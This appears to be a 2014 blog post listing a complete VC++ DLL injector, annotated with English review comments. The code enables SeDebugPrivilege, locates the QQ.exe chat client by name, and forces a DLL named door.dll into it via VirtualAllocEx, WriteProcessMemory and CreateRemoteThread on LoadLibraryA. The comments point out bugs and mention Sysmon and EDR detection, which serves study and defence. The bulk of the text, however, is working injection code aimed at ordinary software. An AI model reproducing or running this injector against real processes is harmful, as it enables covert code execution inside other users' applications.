VC++注射过程
2014/10/19 11:12
// stdafx.h :
//
//
// #pragma once #include "targetver.h" #include <stdio.h>
#include <tchar.h> //myself
#include <Windows.h> #include <TlHelp32.h> #include <iostream>
using namespace std; // TODO:
// Inject.cpp :
// #include "stdafx.h" /*
*
*/
// ---------------------------------------------------------------------------
// Listing from the post: a minimal Win32 DLL injector in three steps —
// enable a privilege on our own token, locate a process by image name in a
// Toolhelp snapshot, then start a remote thread at kernel32!LoadLibraryA with
// the DLL path as its argument. The comments describe what the code as
// written does and where it falls short; the OpenProcess/VirtualAllocEx/
// WriteProcessMemory/CreateRemoteThread sequence is exactly the one host
// telemetry (e.g. Sysmon Event ID 10 ProcessAccess and Event ID 8
// CreateRemoteThread) and EDR user-mode hooks are built to surface.
// ---------------------------------------------------------------------------

// Enables the privilege called `name` (the caller passes SE_DEBUG_NAME) on
// the current process token. Always returns 0: none of the three Win32 calls
// below are checked, so a failed lookup or adjustment is silent, and hToken
// is never closed (handle leak on every call).
int EnableDebugePriv(const char * name){
    HANDLE hToken;
    // Single-entry privilege set: the LUID for `name`, marked enabled.
    TOKEN_PRIVILEGES tp;
    LUID luid;
    // TOKEN_ADJUST_PRIVILEGES is required to change privileges; TOKEN_QUERY
    // would only be needed if a previous state were requested (it is not).
    OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken);
    // NULL system name: resolve the privilege on the local machine.
    LookupPrivilegeValue(NULL,name,&luid);
    tp.PrivilegeCount=1;
    tp.Privileges[0].Luid=luid;
    tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    // DisableAllPrivileges=0 -> apply `tp`; no previous state captured.
    // NOTE(review): AdjustTokenPrivileges reports TRUE even when the
    // privilege is not held by the account (GetLastError() ==
    // ERROR_NOT_ALL_ASSIGNED), so even a checked return would not prove
    // SeDebugPrivilege was actually granted.
    AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
    return 0;
}

// Loads `DllFullPath` into the process with id `dwRemoteProcessId` by copying
// the path string into that process and running LoadLibraryA on it from a
// remote thread. Returns FALSE only when CreateRemoteThread fails; the
// results of OpenProcess, VirtualAllocEx and WriteProcessMemory are not
// checked, so a NULL process handle or a failed write still reaches the
// thread-creation call.
BOOL InjectDLL(const char * DllFullPath, const DWORD dwRemoteProcessId){
    HANDLE hRemoteProcess;
    // Return value ignored (and EnableDebugePriv always returns 0 anyway).
    EnableDebugePriv(SE_DEBUG_NAME);
    // Full-access, non-inheritable handle to the target. A bad PID (including
    // the 0xFFFFFFFF "not found" value from GetProcessId) yields NULL here,
    // which is then passed to every call below unchecked.
    hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId);
    char * pszLibFileRemote;
    // Remote buffer for the NUL-terminated path: lstrlen+1 bytes, committed,
    // zero-filled, read/write. On failure pszLibFileRemote is NULL and is
    // still handed to WriteProcessMemory and to the remote thread.
    pszLibFileRemote=(char *)VirtualAllocEx(hRemoteProcess,NULL,lstrlen(DllFullPath)+1,MEM_COMMIT,PAGE_READWRITE);
    // Copy the path into the target; bytes-written count is not requested.
    WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(void *)DllFullPath,lstrlen(DllFullPath)+1,NULL);
    // Resolve LoadLibraryA in *this* process and reuse the address in the
    // target. That only holds if the target has the same bitness and the
    // same kernel32 base as this process — nothing here verifies either.
    PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")),"LoadLibraryA");
    HANDLE hRemoteThread;
    // New thread in the target: default attributes and stack size, entry
    // LoadLibraryA, argument = remote copy of the path, runs immediately.
    if((hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL))==NULL){
        // Prints an empty line; hRemoteProcess is leaked on this path.
        cout<<""<<endl;
        return FALSE;
    }
    // Success path: the thread is not waited on, so whether LoadLibraryA
    // actually succeeded is unknown to the caller, and the remote buffer is
    // never released with VirtualFreeEx.
    CloseHandle(hRemoteThread);
    CloseHandle(hRemoteProcess);
    return TRUE;
}

// Walks a Toolhelp process snapshot and returns the PID of the first entry
// matched against the hard-coded name "QQ.exe". This overloads (does not
// replace) the Win32 GetProcessId(HANDLE) declared in <Windows.h>.
// Visible defects: `Pid` is an unsigned DWORD, so the -1 "not found" value
// is 0xFFFFFFFF; the strstr arguments look reversed (the constant is the
// haystack, the snapshot entry the needle), so any image name that is a
// substring of "QQ.exe" also matches; Process32First's result is ignored;
// hSnap is never closed on any return path.
DWORD GetProcessId(){
    DWORD Pid=-1;
    // Snapshot of all processes (th32ProcessID is ignored for SNAPPROCESS).
    HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    // dwSize must be set before each Process32First/Next call.
    PROCESSENTRY32 lPrs;
    ZeroMemory(&lPrs,sizeof(PROCESSENTRY32));
    lPrs.dwSize=sizeof(lPrs);
    // String literal bound to a non-const char* (deprecated conversion).
    char * TargetFile="QQ.exe";
    // First entry is checked separately from the loop below.
    Process32First(hSnap,&lPrs);
    if(strstr(TargetFile,lPrs.szExeFile)!=NULL){
        Pid=lPrs.th32ProcessID;
        return Pid;
    }
    while(1){
        ZeroMemory(&lPrs,sizeof(PROCESSENTRY32));
        lPrs.dwSize=sizeof(lPrs);
        // FALSE from Process32Next means the list is exhausted (or an error).
        if(!Process32Next(hSnap,&lPrs)){
            Pid=-1;
            break;
        }
        // Case-sensitive substring test, same argument order as above.
        if(strstr(TargetFile,lPrs.szExeFile)!=NULL){
            Pid=lPrs.th32ProcessID;
            break;
        }
    }
    return Pid;
}

// Entry point: builds "<current directory>\door.dll" and injects it into the
// process returned by GetProcessId(). GetCurrentDirectory is the working
// directory, not the executable's own directory, so the DLL path depends on
// how the program was launched. strcat is unbounded: a directory name close
// to MAX_PATH overflows myFile. InjectDLL's return value is discarded.
int _tmain(int argc, _TCHAR* argv[])
{
    char myFile[MAX_PATH];
    GetCurrentDirectory(MAX_PATH,myFile);
    strcat(myFile,"\\door.dll");
    InjectDLL(myFile,GetProcessId());
    return 0;
}